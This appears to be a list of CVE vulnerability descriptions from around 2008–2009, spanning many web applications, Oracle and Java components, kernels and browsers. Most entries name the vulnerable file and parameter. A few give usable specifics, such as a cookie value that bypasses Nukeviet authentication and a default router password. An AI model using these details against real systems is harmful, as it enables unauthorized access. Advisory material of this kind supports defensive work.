Cross-site scripting (XSS) vulnerability in seeurl.php in Xavier Flahaut URLStreet 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) language, (2) order, and (3) filter parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in adminler.asp in CoBaLT 2.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in Philippe CROCHAT EasySite 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the EASYSITE_BASE parameter to (1) browser.php, (2) image_editor.php and (3) skin_chooser.php in configuration/.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in unspecified Portlets in Sun Java System Portal Server 7.0 and 7.1 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple unspecified vulnerabilities in the admin backend in w3b&gt;cms (aka w3blabor CMS) before 3.2.0 have unknown impact and remote attack vectors.
SQL injection vulnerability in index.php in Hispah Text Links Ads 1.1 allows remote attackers to execute arbitrary SQL commands via the idtl parameter in a buy action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
EveryBlog 5.x and 6.x, a module for Drupal, allows remote attackers to bypass access restrictions via unknown vectors.
Unspecified vulnerability in EveryBlog 5.x and 6.x, a module for Drupal, allows remote attackers to gain privileges as another user or an administrator via unknown attack vectors.
Unspecified vulnerability in the user editing interface in Moodle 1.5.x, 1.6 before 1.6.6, and 1.7 before 1.7.3 allows remote authenticated users to gain privileges via unknown vectors.
Static code injection vulnerability in gooplecms/admin/account/action/editpass.php in Goople CMS 1.7 allows remote attackers to inject arbitrary PHP code into admin/userandpass.php via the (1) username and (2) password parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in SemanticScuttle before 0.90 has unknown impact and attack vectors related to improper validation of parameters to profile.php.
Cross-site request forgery (CSRF) vulnerability in IBM Workplace for Business Controls and Reporting 2.x and IBM Workplace Web Content Management 6.x has unknown impact and remote attack vectors.  NOTE: some of these details are obtained from third party information.
SQL injection vulnerability in aspkat.asp in Bahar Download Script 2.0 allows remote attackers to execute arbitrary SQL commands via the kid parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
StorageCrypt 2.0.1 does not properly encrypt disks, which allows local users to obtain sensitive information via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in Meet#Web 0.8 allow remote attackers to execute arbitrary PHP code via a URL in the root_path parameter to (1) modules.php, (2) ManagerResource.class.php, (3) ManagerRightsResource.class.php, (4) RegForm.class.php, (5) RegResource.class.php, and (6) RegRightsResource.class.php in classes/.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in dispatch.php in Achievo 1.3.2 allows remote attackers to inject arbitrary web script or HTML via the atkaction parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the NFSv4 client module in the kernel on Sun Solaris 10 and OpenSolaris before snv_37, when automountd is used, allows user-assisted remote attackers to cause a denial of service (unresponsive NFS filesystems) via unknown vectors.
Multiple unspecified vulnerabilities in Attachmate Reflection for Secure IT UNIX Client and Server before 7.0 SP1 have unknown impact and attack vectors, aka "security vulnerabilities found by 3rd party analysis."
SQL injection vulnerability in index.php in EACOMM DO-CMS 3.0 allows remote attackers to execute arbitrary SQL commands via the p parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in questions.php in EsFaq 2.0 allows remote attackers to execute arbitrary SQL commands via the cid parameter, a different vector than CVE-2008-3952.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in search.php in EsFaq 2.0 allow remote attackers to execute arbitrary SQL commands via the (1) keywords and (2) cat parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Check Point Connectra NGX R62 HFA_01 allows remote attackers to inject arbitrary web script or HTML via the dir parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in links.asp in Active Price Comparison 4.0 allows remote attackers to execute arbitrary SQL commands via the linkid parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Tribiq CMS Community 5.0.10B and 5.0.11E allows remote attackers to inject arbitrary web script or HTML via the cID parameter in a document action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in Tribiq CMS Community 5.0.10B and 5.0.11E allows remote attackers to execute arbitrary SQL commands via the cID parameter in a document action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in KTP Computer Customer Database (KTPCCD) CMS, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the lname parameter in a login action to an unspecified component.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Nukeviet 2.0 Beta allows remote attackers to bypass authentication and gain administrative access by setting the admf cookie to 1.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in MODx 0.9.6.1p2 and earlier allows remote attackers to perform unauthorized actions as other users via unknown vectors.
SQL injection vulnerability in diary_viewC.asp in ASP-DEv XM Events Diary allows remote attackers to execute arbitrary SQL commands via the cat parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the XSS filter (framework/Text_Filter/Filter/xss.php) in Horde Application Framework 3.2.2 and 3.3, when Internet Explorer is being used, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to style attributes.
Unspecified vulnerability in txzonemgr in Sun OpenSolaris has unknown impact and local attack vectors, related to a "Temporary file vulnerability," aka Bug ID 6653462.
Unspecified vulnerability in conv_lpd in Sun OpenSolaris has unknown impact and local attack vectors, related to improper handling of temporary files, aka Bug ID 6655641.
Unspecified vulnerability in the root/boot archive tool in Sun OpenSolaris has unknown impact and local attack vectors, related to a "Temporary file vulnerability," aka Bug ID 6653455.
The rdp_rdp_process_color_pointer_pdu function in rdp/rdp_rdp.c in xrdp 0.4.1 and earlier allows remote RDP servers to have an unknown impact via input data that sets crafted values for certain length variables, leading to a buffer overflow.
phplist before 2.10.8 allows remote attackers to include files via unknown vectors, related to a "local file include vulnerability."
Directory traversal vulnerability in Yerba SACphp 6.3 allows remote attackers to read arbitrary files, and possibly have other impact, via directory traversal sequences in the mod field contained in the base64-encoded SID parameter to an unspecified component.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
** REJECT **
Multiple unspecified vulnerabilities in SPIP 1.8 before 1.8.3b, 1.9 before 1.9.2g, and 2.0 before 2.0.2 have unknown impact and attack vectors.
Unspecified vulnerability in the Dictionary (rtgdictionary) extension 0.1.9 and earlier for TYPO3 allows attackers to execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in PrestaShop e-Commerce Solution before 1.1 Beta 2 (aka 1.1.0.1) have unknown impact and attack vectors, related to the (1) bankwire module, (2) cheque module, and other components.
Cross-site scripting (XSS) vulnerability in FlatnuX CMS (aka Flatnuke3) 2008-12-11 allows remote attackers to inject arbitrary web script or HTML via the name parameter in an updaterecord action to index.php in the 08_Files module.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in PHParanoid before 0.5 allows remote attackers to perform unspecified actions as authenticated users via unknown vectors related to private messages.
Multiple unspecified vulnerabilities in FreeBSD 6 before 6.4-STABLE, 6.3 before 6.3-RELEASE-p7, 6.4 before 6.4-RELEASE-p1, 7.0 before 7.0-RELEASE-p7, 7.1 before 7.1-RC2, and 7 before 7.1-PRERELEASE allow local users to gain privileges via unknown attack vectors related to function pointers that are "not properly initialized" for (1) netgraph sockets and (2) bluetooth sockets.
Multiple CRLF injection vulnerabilities in AIST NetCat 3.12 and earlier allow remote attackers to have an unknown impact via unspecified vectors involving (1) a %0a sequence in a cookie and (2) the add.php file.
Multiple unspecified vulnerabilities in the web management interface in Avaya Communication Manager (CM) 3.1.x, 4.0.3, and 5.x allow remote attackers to read (1) configuration files, (2) log files, (3) binary image files, and (4) help files via unknown vectors.
Multiple unspecified vulnerabilities in the web management interface in Avaya Communication Manager (CM) 3.1 before 3.1.4 SP2, 4.0 before 4.0.3 SP1, and 5.0 before 5.0 SP3 allow remote authenticated users to execute arbitrary code via unknown attack vectors in the (1) Set Static Routes and (2) Backup History components.
Buffer underflow in the ibwdt_ioctl function in drivers/watchdog/ib700wdt.c in the Linux kernel before 2.6.28-rc1 might allow local users to have an unknown impact via a certain /dev/watchdog WDIOC_SETTIMEOUT IOCTL call.
Unspecified vulnerability in Opera before 9.63 allows remote attackers to "reveal random data" via unknown vectors.
Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
Unspecified vulnerability in IBM WebSphere Portal 6.0 before 6.0.1.5 has unknown impact and attack vectors related to "Access problems with BasicAuthTAI."
PHParanoid before 0.4 does not properly restrict access to the members area by unauthenticated users, which has unknown impact and remote attack vectors.
Multiple buffer overflows in Sun Java Wireless Toolkit (WTK) for CLDC 2.5.2 and earlier allow downloaded programs to execute arbitrary code via unknown vectors.
The IPv4 Forwarding feature in Sun Solaris 10 and OpenSolaris snv_47 through snv_82, with certain patches installed, allows remote attackers to cause a denial of service (panic) via unknown vectors that trigger a NULL pointer dereference.
Cross-site scripting (XSS) vulnerability in the frontend plugin for the felogin system extension in TYPO3 4.2.0, 4.2.1 and 4.2.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple SQL injection vulnerabilities in MyioSoft EasyBookMarker 4.0 allow remote attackers to execute arbitrary SQL commands via the (1) delete_folder and (2) delete_link parameters to unspecified vectors, possibly to (a) plugins/bookmarker/bookmarker_backend.php or (b) ajaxp.php, different vectors than CVE-2008-5654.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the HTML sanitizer filter in Trac before 0.11.2 allows attackers to conduct phishing attacks via unknown attack vectors.
Unspecified vulnerability in Trac before 0.11.2 allows attackers to cause a denial of service via unknown attack vectors related to "certain wiki markup."
Cross-site scripting (XSS) vulnerability in the file backend module in TYPO3 4.2.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Asterisk Open Source 1.2.26 through 1.2.30.3 and Business Edition B.2.3.5 through B.2.5.5, when realtime IAX2 users are enabled, allows remote attackers to cause a denial of service (crash) via authentication attempts involving (1) an unknown user or (2) a user using hostname matching.
Unspecified vulnerability in the Sun Java Web Console components in Sun Java System Portal Server 7.1 and 7.2 allows remote attackers to access local files and read the product's configuration information via unknown vectors related to "access to secure files by ThemeServlet."
Unspecified vulnerability in the session-restore feature in Mozilla Firefox 3.x before 3.0.5 and 2.x before 2.0.0.19 allows remote attackers to bypass the same origin policy, inject content into documents associated with other domains, and conduct cross-site scripting (XSS) attacks via unknown vectors related to restoration of SessionStore data.
Multiple unspecified vulnerabilities in Mozilla Firefox 3.x before 3.0.5 and 2.x before 2.0.0.19, Thunderbird 2.x before 2.0.0.19, and SeaMonkey 1.x before 1.1.14 allow remote attackers to run arbitrary JavaScript with chrome privileges via unknown vectors in which "page content can pollute XPCNativeWrappers."
Unspecified vulnerability in the GungHo LoadPrgAx ActiveX control 1.0.0.6 and earlier allows remote attackers to execute arbitrary Java applications via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise Campus Solutions component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.9.18 and 9.0.8 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the WebLogic Portal component in BEA Product Suite 10.3, 10.2, 10.0 MP1, 9.2 MP3, and 8.1 SP6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, and 9.0 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10 and CU2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.9.18 and 9.0.8 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS - ePerformance component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.9.18 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the iProcurement component in Oracle E-Business Suite 11.5.10 CU2 and 12.0.6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.9.18 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the JD Edwards Tools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.97.2.5 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Applications Platform Engineering component in Oracle E-Business Suite 11.5.10 CU2 and 12.0.6 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5444 and CVE-2008-5448.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5444 and CVE-2008-5449.
Unspecified vulnerability in the Oracle Enterprise Manager component in Oracle Enterprise Manager 10.2.0.4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10 CU2 and 12.0.6 allows remote authenticated users to affect confidentiality via unknown vectors.  NOTE: the previous information was obtained from the January 2009 CPU.  Oracle has not commented on reliable researcher claims that this issue is related to unrestricted guest access to the "About Us Page" in the Oracle Applications Framework (OAF), which allows attackers to obtain sensitive system and application environment information.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect availability via unknown vectors.  NOTE: the previous information was obtained from the January 2009 CPU.  Oracle has not commented on reliable researcher claims that this issue is a denial of service in observiced.exe via malformed private Protocol data that triggers a NULL pointer dereference.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5448 and CVE-2008-5449.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2008-5441 and CVE-2008-5442.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2008-5441 and CVE-2008-5443.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2008-5442 and CVE-2008-5443.
Unspecified vulnerability in the TimesTen Data Server component in Oracle Database 7.0.5.0.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the January 2009 CPU. Oracle has not commented on reliable researcher claims that this is a format string vulnerability via the msg parameter in the evtdump CGI module.
Unspecified vulnerability in the SQL*Plus Windows GUI component in Oracle Database 10.2.0.4 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 10.1.2.3 and 10.1.4.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle OLAP component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.4 allows remote authenticated users to affect integrity and availability via unknown vectors.
Unspecified vulnerability in the Feature Pack for Web Services in the Web Services Security component in IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 has unknown impact and attack vectors related to "userNameToken."
Unspecified vulnerability in IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 on Windows has unknown impact and attack vectors related to JSPs.  NOTE: this is probably a duplicate of CVE-2009-0438.
Buffer overflow in the data management protocol in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allows remote authenticated users to cause a denial of service (application crash) and possibly execute arbitrary code via unknown vectors.  NOTE: this can be exploited by unauthenticated remote attackers by leveraging CVE-2008-5407.
Multiple unspecified vulnerabilities in the Backup Exec remote-agent logon process in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allow remote attackers to bypass authentication, and read or delete files, via unknown vectors.
Insecure method vulnerability in the FlexCell.Grid ActiveX control in FlexCell.ocx 5.7.0.1 in FlexCell Grid ActiveX Component allows remote attackers to create and overwrite arbitrary files via the HttpDownloadFile method.  NOTE: this could be leveraged for code execution by creating executable files in Startup folders or by accessing files using hcp:// URLs.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Tor before 0.2.0.32 does not properly process the ClientDNSRejectInternalAddresses configuration option in situations where an exit relay issues a policy-based refusal of a stream, which allows remote exit relays to have an unknown impact by mapping an internal IP address to the destination hostname of a refused stream.
Cross-site request forgery (CSRF) vulnerability in I-O DATA DEVICE HDL-F160, HDL-F250, HDL-F300, and HDL-F320 firmware before 1.02 allows remote attackers to (1) change a configuration or (2) delete files as an authenticated user via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; SDK and JRE 1.4.2_18 and earlier; and SDK and JRE 1.3.1_23 and earlier creates temporary files with predictable file names, which allows attackers to write malicious JAR files via unknown vectors.
Unspecified vulnerability in Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows untrusted applications and applets to list the contents of the operating user's directory via unknown vectors.
Unspecified vulnerability in Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier, when using Kerberos authentication, allows remote attackers to cause a denial of service (OS resource consumption) via unknown vectors.
Unspecified vulnerability in Java Runtime Environment (JRE) with Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; SDK and JRE 1.4.2_18 and earlier; and SDK and JRE 1.3.1_23 and earlier allows code that is loaded from a local filesystem to read arbitrary files and make unauthorized connections to localhost via unknown vectors.
Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows untrusted applets to read arbitrary files and make unauthorized network connections via unknown vectors related to applet classloading, aka 6716217.
Unspecified vulnerability in the BasicService for Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows untrusted downloaded applications to cause local files to be displayed in the browser of the user of the untrusted application via unknown vectors, aka 6767668.
Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier, and JDK and JRE 5.0 Update 16 and earlier, allows untrusted JWS applications to obtain the pathname of the JWS cache and the application username via unknown vectors, aka CR 6727071.
Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows untrusted JWS applications to gain privileges to access local files or applications via unknown vectors, aka 6727081.
Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows untrusted JWS applications to perform network connections to unauthorized hosts via unknown vectors, aka CR 6727079.
Unspecified vulnerability in Tikiwiki before 2.2 has unknown impact and attack vectors related to tiki-error.php, a different issue than CVE-2008-3653.
Unspecified vulnerability in Tikiwiki before 2.2 has unknown impact and attack vectors related to "size of user-provided input," a different issue than CVE-2008-3653.
Integer signedness error in the cmsAllocGamma function in src/cmsgamma.c in Little cms color engine (aka lcms) before 1.17 allows attackers to have an unknown impact via a file containing a certain "number of entries" value, which is interpreted improperly, leading to an allocation of insufficient memory.
Buffer overflow in the ReadEmbeddedTextTag function in src/cmsio1.c in Little cms color engine (aka lcms) before 1.16 allows attackers to have an unknown impact via vectors related to a length parameter inconsistency involving the contents of "the input file," a different vulnerability than CVE-2007-2741.
Google Hack Honeypot (GHH) File Upload Manager 1.3 allows remote attackers to delete uploaded files via unknown vectors related to the delall action to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. CVE analysis suggests that the most recent version as of 20081128 is 1.2, and the File Upload Manager does not have a "delall" action.
Todd Woolums ASP News Management 2.2 allows remote attackers to obtain news items via a direct request to (1) rss.asp, (2) viewheadings.asp, or (3) viewnews.asp.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in the Special:Import feature in MediaWiki 1.3.0 through 1.6.10, 1.12.x before 1.12.2, and 1.13.x before 1.13.3 allows remote attackers to perform unspecified actions as authenticated users via unknown vectors.
Multiple heap-based buffer overflows in xine-lib before 1.1.15 allow remote attackers to execute arbitrary code via vectors that send ID3 data to the (1) id3v22_interp_frame and (2) id3v24_interp_frame functions in src/demuxers/id3.c.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
xine-lib before 1.1.15 performs V4L video frame preallocation before ascertaining the required length, which has unknown impact and attack vectors, possibly related to a buffer overflow in the open_video_capture_device function in src/input/input_v4l.c.
Unspecified vulnerability in xine-lib before 1.1.15 has unknown impact and attack vectors related to libfaad.  NOTE: due to the lack of details, it is not clear whether this is an issue in xine-lib or in libfaad.
Buffer overflow in the CallHTMLHelp method in the Microsoft Windows Media Services ActiveX control in nskey.dll 4.1.00.3917 in Windows Media Services on Microsoft Windows NT and 2000, and Avaya Media and Message Application servers, allows remote attackers to execute arbitrary code via a long argument.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in PHPCow allows remote attackers to execute arbitrary code via unknown vectors, related to a "file inclusion vulnerability," as exploited in the wild in November 2008.
Multiple directory traversal vulnerabilities in Jonascms 1.2 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the taal parameter to (1) backup.php and (2) gb_voegtoe.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in modules/mod_mainmenu.php in MosXML 1 Alpha allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The inotify functionality in Linux kernel 2.6 before 2.6.28-rc5 might allow local users to gain privileges via unknown vectors related to race conditions in inotify watch removal and umount.
Multiple cross-site scripting (XSS) vulnerabilities in Yazd Forum Software 3.x allow remote attackers to inject arbitrary web script or HTML via the (1) q parameter to (a) search.jsp, and the (2) msg parameter to (b) error.jsp and (c) userAccount.jsp.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Error handling in the SSH protocol in (1) SSH Tectia Client and Server and Connector 4.0 through 4.4.11, 5.0 through 5.2.4, and 5.3 through 5.3.8; Client and Server and ConnectSecure 6.0 through 6.0.4; Server for Linux on IBM System z 6.0.4; Server for IBM z/OS 5.5.1 and earlier, 6.0.0, and 6.0.1; and Client 4.0-J through 4.3.3-J and 4.0-K through 4.3.10-K; and (2) OpenSSH 4.7p1 and possibly other versions, when using a block cipher algorithm in Cipher Block Chaining (CBC) mode, makes it easier for remote attackers to recover certain plaintext data from an arbitrary block of ciphertext in an SSH session via unknown vectors.
Buffer overflow in the lbs_process_bss function in drivers/net/wireless/libertas/scan.c in the libertas subsystem in the Linux kernel before 2.6.27.5 allows remote attackers to have an unknown impact via an "invalid beacon/probe response."
Unspecified vulnerability in the socket function in Sun Solaris 10 and OpenSolaris snv_57 through snv_91, when InfiniBand hardware is not installed, allows local users to cause a denial of service (panic) via unknown vectors, related to the socksdpv_close function.
Unspecified vulnerability in Adobe AIR 1.1 and earlier allows context-dependent attackers to execute untrusted JavaScript in an AIR application via unknown attack vectors.
Unspecified vulnerability in the TYPO3 File List (file_list) extension 0.2.1 and earlier allows remote attackers to obtain sensitive information via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in the Novell User Application 3.0.1, 3.5.0, and 3.5.1; and Identity Manager Roles Based Provisioning Module 3.6.0 and 3.6.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Heap-based buffer overflow in the NDS Service in Novell eDirectory before 8.8 SP3 has unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in the HTTP Protocol Stack (HTTPSTK) in Novell eDirectory before 8.8 SP3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Heap-based buffer overflows in Novell eDirectory HTTP protocol stack (HTTPSTK) before 8.8 SP3 have unknown impact and attack vectors related to the (1) HTTP language header and (2) HTTP content-length header.
Multiple cross-site scripting (XSS) vulnerabilities in Kmita Gallery allow remote attackers to inject arbitrary web script or HTML via the (1) begin parameter to index.php and the (2) searchtext parameter to search.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in search.php in Kmita Catalogue 2.x allows remote attackers to inject arbitrary web script or HTML via the q parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in film.asp in Yigit Aybuga Dizi Portali allows remote attackers to execute arbitrary SQL commands via the film parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The AppendAttributeValue function in the JavaScript engine in Mozilla Firefox 2.x before 2.0.0.18, Thunderbird 2.x before 2.0.0.18, and SeaMonkey 1.x before 1.1.13 allows remote attackers to cause a denial of service (crash) via unknown vectors that trigger memory corruption, as demonstrated by e4x/extensions/regress-410192.js.
Sweex RO002 Router with firmware Ts03-072 has "rdc123" as its default password for the "rdc123" account, which makes it easier for remote attackers to obtain access.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The chip_command function in drivers/media/video/tvaudio.c in the Linux kernel 2.6.25.x before 2.6.25.19, 2.6.26.x before 2.6.26.7, and 2.6.27.x before 2.6.27.3 allows attackers to cause a denial of service (NULL function pointer dereference and OOPS) via unknown vectors.
Multiple integer overflows in Python 2.2.3 through 2.5.1, and 2.6, allow context-dependent attackers to have an unknown impact via a large integer value in the tabsize argument to the expandtabs method, as implemented by (1) the string_expandtabs function in Objects/stringobject.c and (2) the unicode_expandtabs function in Objects/unicodeobject.c.  NOTE: this vulnerability reportedly exists because of an incomplete fix for CVE-2008-2315.
The session restore feature in Mozilla Firefox 3.x before 3.0.4 and 2.x before 2.0.0.18 allows remote attackers to violate the same origin policy to conduct cross-site scripting (XSS) attacks and execute arbitrary JavaScript with chrome privileges via unknown vectors.
Integer overflow in xpcom/io/nsEscape.cpp in the browser engine in Mozilla Firefox 3.x before 3.0.4, Firefox 2.x before 2.0.0.18, Thunderbird 2.x before 2.0.0.18, and SeaMonkey 1.x before 1.1.13 allows remote attackers to cause a denial of service (crash) via unknown vectors.
in.dhcpd in the DHCP implementation in Sun Solaris 8 through 10, and OpenSolaris before snv_103, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via unknown DHCP requests related to the "number of offers," aka Bug ID 6713805.
Buffer overflow in src/src_sinc.c in Secret Rabbit Code (aka SRC or libsamplerate) before 0.1.4, when "extreme low conversion ratios" are used, allows user-assisted attackers to have an unknown impact via a crafted audio file.
The SPARC hypervisor in Sun System Firmware 6.6.3 through 6.6.5 and 7.1.3 through 7.1.3.e on UltraSPARC T1, T2, and T2+ processors allows logical domain users to access memory in other logical domains via unknown vectors.
Microsoft Windows Media Player (WMP) 9.0 through 11 allows user-assisted attackers to cause a denial of service (application crash) via a malformed (1) MIDI or (2) DAT file, related to "MThd Header Parsing." NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in VMware Workstation 5.5.8 and earlier, and 6.0.5 and earlier 6.x versions; VMware Player 1.0.8 and earlier, and 2.0.5 and earlier 2.x versions; VMware Server 1.0.9 and earlier; VMware ESXi 3.5; and VMware ESX 3.0.2 through 3.5 allows guest OS users to have an unknown impact by sending the virtual hardware a request that triggers an arbitrary physical-memory write operation, leading to memory corruption.
